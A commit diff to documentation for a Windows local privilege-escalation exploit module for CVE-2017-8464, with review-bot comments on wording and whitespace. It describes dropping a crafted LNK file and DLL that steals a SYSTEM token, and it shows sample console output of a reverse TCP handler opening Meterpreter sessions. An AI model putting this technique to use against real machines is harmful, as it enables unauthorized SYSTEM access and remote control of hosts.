Commit fa8d017

Change documentation from a first person context
1 parent 11093b8 commit fa8d017

1 file changed

+4
-4
lines changed

documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md

Lines changed: 4 additions & 4 deletions
@@ -1,5 +1,5 @@
11
## Description
2-
This PR adds a new Windows local exploit version of the existing file
2+
This module is a Windows local exploit version of the existing file
33
format module for CVE-2017-8464. The module works by dropping the
44
specially crafted LNK file and DLL to disk, which causes
55
`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via
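Review bot: new line 2 still refers to "the existing file format module for CVE-2017-8464" without naming it, so a reader of this document alone cannot tell which module is meant. Suggest giving that module's full path in backticks, the same way `SearchProtocolHost.exe` is marked up on line 5.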
@@ -9,7 +9,7 @@ this can be used to elevate privileges.
99
The original DLL template needed some significant reworking to make it
1010
compatible for execution within `SearchProtocolHost.exe`. The payload
1111
was originally failing in the hollowed child `rundll32.exe` process with
12-
a denied error from winsock. I addressed this by checking if the process
12+
a denied error from winsock. This was addressed by checking if the process
1313
which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is,
1414
it opens the token of another SYSTEM process and passes it to
1515
`CreateProcessAsUser` for the payload to work. When the DLL is loaded
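Review bot: on new line 12 the passive "This was addressed by checking if the process" leaves the rest of the sentence, "and when it is, it opens the token of another SYSTEM process", with no clear subject for the second "it". Suggest making the DLL the subject throughout, for example "The DLL now checks whether the process that loaded it is `SearchProtocolHost.exe` and, when it is, opens the token of another SYSTEM process and passes it to `CreateProcessAsUser`." The phrase "a denied error from winsock" on line 12 would also be clearer if it quoted the actual error.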
@@ -69,7 +69,7 @@ Exploit target:
6969
[*] > Ruby Code (13 bytes)
7070
> run -z
7171
[*] Exploit running as background job 0.
72-
[*] Started reverse TCP handler on 192.168.135.112:30001
72+
[*] Started reverse TCP handler on 192.168.135.112:30001
7373
[*] Sending stage (205379 bytes) to 192.168.134.133
7474
[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800
7575
> sysinfo
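Review bot: line 72 reads the same in its removed and added forms, "[*] Started reverse TCP handler on 192.168.135.112:30001", so the change appears to be whitespace only and is not covered by the commit message, which describes a change of voice. Suggest either mentioning the whitespace cleanup in the commit message or moving it to its own commit so the wording change is the only thing to review here.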
@@ -132,7 +132,7 @@ Exploit target:
132132
133133
> run -j
134134
[*] Exploit running as background job 1.
135-
[*] Started reverse TCP handler on 192.168.135.112:30002
135+
[*] Started reverse TCP handler on 192.168.135.112:30002
136136
[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
137137
[*] Sending stage (205379 bytes) to 192.168.134.133
138138
[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800
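Review bot: line 135 is another change where the removed and added text are identical as shown, so only whitespace can differ. If trailing whitespace is being stripped from the sample console output, do it for the whole file in one pass rather than on two handler lines, so later diffs of this document do not pick up the remaining lines one at a time.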
